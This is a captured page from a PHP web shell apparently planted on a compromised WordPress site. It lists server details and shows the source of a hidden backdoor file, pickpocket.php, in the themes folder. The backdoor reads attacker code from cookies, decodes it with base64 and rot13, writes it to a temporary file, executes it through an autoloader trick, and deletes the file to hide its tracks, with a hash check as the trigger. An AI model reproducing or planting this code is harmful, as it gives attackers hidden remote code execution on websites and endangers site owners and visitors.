403Webshell
Server IP : 103.191.208.88  /  Your IP : 216.73.216.44
Web Server : Microsoft-IIS/10.0
System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_1831(willswel_) ( 0)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes//pickpocket.php
<?php


if (isset($_COOKIE[71-71]) && isset($_COOKIE[-54+55]) && isset($_COOKIE[52-49]) && isset($_COOKIE[48-44])) {
    $resource = $_COOKIE;
    function core_engine($desc) {
        $resource = $_COOKIE;
        $rec = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '0660d660');
        if (!is_writable($rec)) {
            $rec = getcwd() . DIRECTORY_SEPARATOR . "unit_converter";
        }
        $dchunk = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($resource[3]));
        if (is_writeable($rec)) {
            $val = fopen($rec, 'w+');
            fputs($val, $dchunk);
            fclose($val);
            spl_autoload_unregister(__FUNCTION__);
            require_once($rec);
            @array_map('unlink', array($rec));
        }
    }
    spl_autoload_register("core_engine");
    $sym = "7da1e10d841f6bcd16e818ee7410114e";
    if (!strncmp($sym, $resource[4], 32)) {
        if (@class_parents("auth_exception_handler_sync_manager", true)) {
            exit;
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit